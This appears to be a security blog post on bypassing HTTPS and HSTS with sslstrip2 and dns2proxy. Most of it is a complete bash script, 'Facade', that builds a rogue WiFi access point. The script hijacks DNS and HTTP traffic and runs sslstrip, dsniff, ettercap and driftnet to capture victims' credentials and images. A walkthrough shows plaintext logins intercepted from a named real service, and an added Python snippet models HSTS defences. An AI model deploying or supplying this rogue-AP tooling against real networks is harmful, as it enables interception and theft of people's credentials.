In 2009 I gave a presentation entitled ‘Human 0-Days’ in which I made two very clear points:

  1. The inherent selfishness of humans is perhaps their most gaping, easily exploitable vulnerability.
  2. An organisation's weakest point will always be its employees, due to the above.
To illustrate these two points I performed a demonstration of how a rogue wireless access point could be used to both extract confidential information from associated clients and infect them with malware. Whilst the latter task has remained consistently effective over the past few years, the widespread use of SSL/TLS and HTTP Strict Transport Security has made intercepting readable and usable information somewhat more difficult – at least until now…

sslstrip

sslstrip, a now infamous tool written by Moxie Marlinspike and first demonstrated at Black Hat DC 2009, transparently hijacks HTTP traffic on a network and downgrades HTTPS traffic to HTTP – allowing the contents of otherwise confidential packets to be read. Its prerequisite, however, is that the attacker is a man-in-the-middle.

In reaction to the global chaos that followed this, a mitigation was drafted in June 2010: an HTTP response header that informs a browser that a particular domain (or its sub-domains) should only ever be visited over HTTPS. This would become officially known in November 2012 as HTTP Strict Transport Security. It has since been further developed to include a list of HTTPS-only domains that ships with all browsers – except IE, of course. Almost all major services implement it now, but its adoption is still extremely low.

sslstrip2

sslstrip2 (aka sslstrip+) is a rework of sslstrip by Leonardo Nve, designed to thwart HSTS. It achieves this through the following process:

  1. A victim is forced to connect (e.g. via a karma attack), or voluntarily connects, to a rogue hotspot.
  2. iptables on the router redirects all UDP port 53 (DNS) traffic to its own DNS server, dns2proxy.
  3. When the victim attempts to connect to a server, the DNS query is caught by dns2proxy, which in turn queries a legitimate DNS server and responds to the client with a modified and reordered list – optionally with the attacker's IP at the top.
  4. sslstrip2 strips HTTPS by acting as a reverse proxy: client > router is HTTP, and router > server is HTTPS. HSTS is bypassed by altering the domain names used by the client and resolving them to the legitimate IP.

A better explanation of this is given in Leonardo’s presentation at Black Hat Asia 2014.
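As an added illustration (not part of the original post or the Facade script), the following Python models the browser-side HSTS host cache from RFC 6797 and shows why the hostname rewrite in step 4 defeats a policy set only on the login host, and how includeSubDomains on the registered domain (ideally preloaded) closes that gap. The hostnames and headers are constructed for the example.

```python
import re

class HstsCache:
    """Minimal model of a browser's HSTS host cache (RFC 6797 s8.1-8.3); constructed example."""

    def __init__(self):
        self.known = {}  # host -> True if the policy carried includeSubDomains

    def observe(self, host, headers):
        """Record the STS policy from an HTTPS response; True if a valid policy was stored."""
        sts = next((v for k, v in headers.items()
                    if k.lower() == "strict-transport-security"), None)
        if sts is None:
            return False
        directives = {}
        for d in sts.split(";"):
            name, _, val = d.strip().partition("=")
            if name:
                directives[name.lower()] = val.strip('" ')
        if not re.fullmatch(r"\d+", directives.get("max-age", "")):
            return False  # max-age is mandatory; a malformed header is ignored
        if int(directives["max-age"]) == 0:
            self.known.pop(host.lower(), None)  # max-age=0 removes the policy
            return False
        self.known[host.lower()] = "includesubdomains" in directives
        return True

    def is_known_host(self, host):
        """True if HSTS forces HTTPS for host: exact match, or a superdomain with includeSubDomains."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.known and (i == 0 or self.known[candidate]):
                return True
        return False

def demo():
    """Weak vs corrected configuration against a rewritten (sibling) hostname."""
    cache = HstsCache()
    # Weak: only the login host sets HSTS, so websecure.example.com (a sibling host
    # that a rogue resolver can point at the same IP) is not covered by the policy.
    cache.observe("secure.example.com", {"Strict-Transport-Security": "max-age=31536000"})
    weak = cache.is_known_host("websecure.example.com")
    # Corrected: the registered domain sets includeSubDomains (and preload, so the
    # policy is known to browsers before any HTTPS visit to example.com).
    cache.observe("example.com", {"Strict-Transport-Security":
                                  "max-age=31536000; includeSubDomains; preload"})
    fixed = cache.is_known_host("websecure.example.com")
    return weak, fixed  # (False, True)
```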

usage

I have merged this new build of sslstrip into my rogue AP script, using the combined sslstrip2+dns2proxy rollup from the mana toolkit. The package sits in a subdirectory of the main script named ‘sslstrip’, to which sslstrip2 and dns2proxy also log.
The script has been tested in Linux Mint 17 and 17.1 with pre-requisites installed as follows:
apt-get install ettercap-text-only driftnet dsniff isc-dhcp-server libnl-dev libssl-dev macchanger python-dnspython python-pcapy subversion tcpdump xterm
cd /opt/
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng
make
make install

Unless you can pull the latest build of aircrack-ng from a repository, you'll want to build it as shown above, or you'll likely run into the same WiFi channel fixation issue that I did with my TP-LINK TL-WN722N:

#!/bin/bash
# Facade v1.0.1
# By sub-r0sa
# https://www.bitbucket.com/sub-r0sa

# Version History:
# v1.0.0 (29/11/14) - Initial release.
# v1.0.1 (1/12/14) - Addressed channel fixation by changing to latest aircrack-ng build (1.2rc1).

# Pre-requisites:
# apt-get install ettercap-text-only driftnet dsniff isc-dhcp-server libnl-dev libssl-dev macchanger python-dnspython python-pcapy subversion tcpdump xterm

# Install latest aircrack-ng build (to mitigate 'fixed channel' bug):
# cd /opt/
# svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
# cd aircrack-ng
# make
# make install

# sslstrip-hsts build sourced from the Mana Toolkit: https://github.com/sensepost/mana/tree/master/sslstrip-hsts

# Now, the script...

# Informational.
echo
echo " _______ _______ _______ _______ ______ _______"
echo "( ____ \( ___ )( ____ \( ___ )( __ \ ( ____ \\"
echo "| ( \/| ( ) || ( \/| ( ) || ( \ )| ( \/"
echo "| (__ | (___) || | | (___) || | ) || (__"
echo "| __) | ___ || | | ___ || | | || __)"
echo "| ( | ( ) || | | ( ) || | ) || ( "
echo "| ) | ) ( || (____/\| ) ( || (__/ )| (____/\\"
echo "|/ |/ \|(_______/|/ \|(______/ (_______/"
echo
echo " Facade v1.0.1 -- Rogue AP+"
echo " By sub-r0sa"
echo
echo
echo "[+] Let's get things set up first..."
echo
echo
echo "[+] Displaying network interfaces: "
echo
ip link show
echo
echo
echo "[?] Enter the physical interface that is connected to the internet (default = wlan0): "
read -e internet_interface

if [ -z "$internet_interface" ] ; then
internet_interface="wlan0"
fi

echo "[?] Enter the physical interface to be used for the rogue AP (default = wlan1): "
read -e fakeap_interface

if [ -z "$fakeap_interface" ] ; then
fakeap_interface="wlan1"
fi

echo "[?] Enter the ESSID (network name) you want your rogue AP to use (default = Public WiFi): "
read -e ESSID

if [ -z "$ESSID" ] ; then
ESSID="Public WiFi"
fi

echo "[?] Enter the channel you wish your rogue AP to listen on (default = 11): "
read -e channel

if [ -z "$channel" ] ; then
channel="11"
fi

echo
echo
echo "[!] Initial parameters set, let's get this party started!"
echo
echo
echo "[+] Applying a random MAC address to the rogue AP interface..."
echo
ifconfig "$fakeap_interface" down
sleep 1
macchanger -r "$fakeap_interface"
ifconfig "$fakeap_interface" up
sleep 1
echo
echo "[+] Setting rogue AP WLAN interface to monitor mode..."
echo
airmon-ng start "$fakeap_interface"

echo
echo "[?] Enter the monitor interface to be used for the rogue AP (default = wlan1mon): "
read -e mon_interface

if [ -z "$mon_interface" ] ; then
mon_interface="wlan1mon"
fi

echo
echo "[+] Preparing DHCP..."
# Dhcpd creation (heredoc so the ESSID can be quoted without escaping).
cat > /tmp/dhcpd.conf <<EOF
authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option routers 10.0.0.1;
  option subnet-mask 255.255.255.0;

  option domain-name "$ESSID";
  option domain-name-servers 10.0.0.1;

  range 10.0.0.20 10.0.0.50;
}
EOF

# Rogue AP setup.
echo
echo "[+] Configuring AP..."
echo
echo "[?] Airbase-ng can run in a variety of modes. Do you want to define your own
Custom Configuration (c), use an Evil Twin configuration (e) or use a Default configuration (d)? "
read BASE

if [ -z "$BASE" ] ; then
BASE="d"
fi

if [ "$BASE" = "c" ] ; then
airbase-ng --help
fi

if [ "$BASE" = "c" ] ; then
echo
echo "[?] Enter switches. Note: you have already chosen an ESSID -e and Channel -c, these
cannot be redefined:"
read -e aswitch
if [ -z "$aswitch" ] ; then
echo "Nothing entered. Using default..."
BASE="d"
else
echo
echo "[+] Starting Custom Rogue AP..."
# $aswitch is deliberately unquoted so that several switches are passed as separate arguments.
xterm -geometry 75x15+1+0 -T "FakeAP on channel $channel" -e airbase-ng -c "$channel" $aswitch -e "$ESSID" "$mon_interface" & fakeapid=$!
sleep 2
fi
fi

if [ "$BASE" = "e" ] ; then
echo
echo "[+] Starting Evil AP..."
xterm -geometry 75x15+1+0 -T "FakeAP on ALL channels" -e airbase-ng -P -C 30 -e "$ESSID" $mon_interface & fakeapid=$!
sleep 2
fi

if [ "$BASE" = "d" ] ; then
echo
echo "[+] Starting Default Rogue AP..."
xterm -geometry 75x15+1+0 -T "FakeAP on channel $channel" -e airbase-ng -c "$channel" -e "$ESSID" $mon_interface & fakeapid=$!
sleep 2
fi

echo
echo
echo "[?] Enter the tap interface used for the rogue AP (default = at0): "
read -e tap_interface

if [ -z "$tap_interface" ] ; then
tap_interface="at0"
fi
echo

# Apply networking.
echo "[+] Configuring routing and iptables..."
ifconfig lo up
ifconfig "$tap_interface" up &
sleep 1
ifconfig "$tap_interface" 10.0.0.1 netmask 255.255.255.0

# Force 1500 mtu for stability.
ifconfig "$tap_interface" mtu 1500

# Routing.
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# Flush tables.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Enable kernel forwarding.
echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables.
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A POSTROUTING -o "$internet_interface" -j MASQUERADE
iptables -A FORWARD -i "$tap_interface" -o "$internet_interface" -j ACCEPT
iptables -t nat -A PREROUTING -i "$tap_interface" -p udp --destination-port 53 -j DNAT --to 10.0.0.1
iptables -t nat -A PREROUTING -i "$tap_interface" -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# Set up DHCP on tap interface.
echo "[+] Starting DHCP server..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/tmp/dhcpd.conf" "$tap_interface" & dchpid=$!
sleep 3

# Change PWD.
cd sslstrip

# Start sslstrip.
echo "[+] Starting sslstrip..."
# Log to sslstrip/sslstrip.log (the current directory), which is the file tailed later.
xterm -geometry 75x15+1+200 -T sslstrip -e python sslstrip.py -f lock.ico -l 10000 -a -w sslstrip.log & sslstripid=$!
sleep 2

# Start dns2proxy.
echo "[+] Starting dns2proxy..."
xterm -geometry 75x20+1+300 -T dns2proxy -e python dns2proxy.py "$tap_interface" & dns2proxyid=$!
sleep 2

# Return to root directory.
cd ..

# Start dsniff.
echo "[+] Starting dsniff..."
xterm -geometry 75x20+1+400 -T dsniff -e dsniff -m -i "$tap_interface" -d -w dsniff.log & dsniffid=$!
sleep 2

# Start Ettercap.
echo "[+] Configuring ettercap..."
echo
echo "[?] Ettercap will run in its most basic mode. Would you like to configure any extra switches?
For example, to load plugins or filters. Yes (y) or No (n)? "
read ETTER

if [ -z "$ETTER" ] ; then
ETTER="n"
fi

if [ "$ETTER" = "y" ] ; then
echo
ettercap --help
echo
echo "[?] For the sake of Facade, ettercap WILL USE -u and -p, so you are advised
not to use -M. Note: -i is already set and cannot be redefined here. Do not use the
-w switch. Enter your switches below: "
echo
read -e eswitch

if [ -z "$eswitch" ] ; then
echo "Nothing entered. Using default..."
ETTER="n"
else
echo
echo "[+] Starting ettercap..."
# $eswitch is deliberately unquoted so that several switches are passed as separate arguments.
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u $eswitch -T -q -i "$tap_interface" & ettercapid=$!
sleep 1
fi
fi

if [ "$ETTER" = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w ettercap.log -i "$tap_interface" & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "[?] Would you also like to start driftnet to capture the victims images.
Yes (y) or No (n)? "
read DRIFT

if [ -z "$DRIFT" ] ; then
DRIFT="n"
fi

if [ "$DRIFT" = "y" ] ; then
mkdir -p "driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i "$internet_interface" -p -d driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T sslstrip-log -e tail -f sslstrip/sslstrip.log & sslstriplogid=$!

# Clear window.
clear

echo
echo "[!] Activated!"
echo
echo "[+] Facade is now running. Once a victim connects and surfs, their credentials
will be displayed in ettercap. You may use the right/left mouse buttons to scroll up/down
ettercap's xterm window. ettercap will also save its output to ettercap.log unless you
stated otherwise. Driftnet images will be saved to driftnetdata."
echo
echo
echo "[!] IMPORTANT!"
echo
echo "When you want to close Facade and begin clean up, enter X.
Note: If Facade is not closed properly network instability will ensue..."
echo

# Loop until the termination character is entered.
QUIT=""
while [ "$QUIT" != "X" ]; do
echo "To end, enter X:"
read QUIT
done

# Clean up
echo
echo "[+] Cleaning up processes..."

# Some PIDs may be unset (e.g. driftnet if it was not started), so suppress the errors.
kill ${fakeapid} ${dchpid} ${sslstripid} ${dns2proxyid} ${dsniffid} \
     ${ettercapid} ${dritnetid} ${sslstriplogid} 2>/dev/null

echo
echo "[+] Resetting networking..."
echo
airmon-ng stop "$mon_interface"
sleep 1
ifconfig "$fakeap_interface" down
sleep 1
macchanger -p "$fakeap_interface"
ifconfig "$fakeap_interface" up
sleep 1
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

rm /tmp/dhcpd.conf

echo
echo "[+] Clean up successful."

# End.
exit

walkthrough

The script has a set of default values built into it which, on any system running two WiFi adapters, should let it work straight out of the box without being too demanding.

The script first sets up the adapters, iptables rules, DHCP, and fires up the access point on a tap interface:

sslstrip2, dns2proxy and dsniff are then started using default parameters:

ettercap is then fired up using either a default set of parameters or user defined ones:

Finally, driftnet can be used to capture images that pass through the AP (not done in this case), and the sslstrip log is tailed:

A user connects:

For this test secure.powershop.co.nz was used (disclaimer: this is in no way intended as a ‘how-to’ on how to specifically hack their service, as this is a network-based exploit) as the page the victim wishes to log in to. To their credit, they have their security pretty well sorted out! Their HTTP response headers are well configured, they’re using an EV cert and they’re offering up the strongest cipher suites possible. So, kudos to them:

However, in this case, since the attacker is in control of DNS, dns2proxy serves up the page as websecure.powershop.co.nz and HSTS is bypassed. Additionally, sslstrip adds a nice touch of social engineering by changing the favicon to a lock. Therefore, when the user attempts to log in, the credentials can be intercepted and read as plaintext:

Source

You can find the updated source for Facade on GitHub.
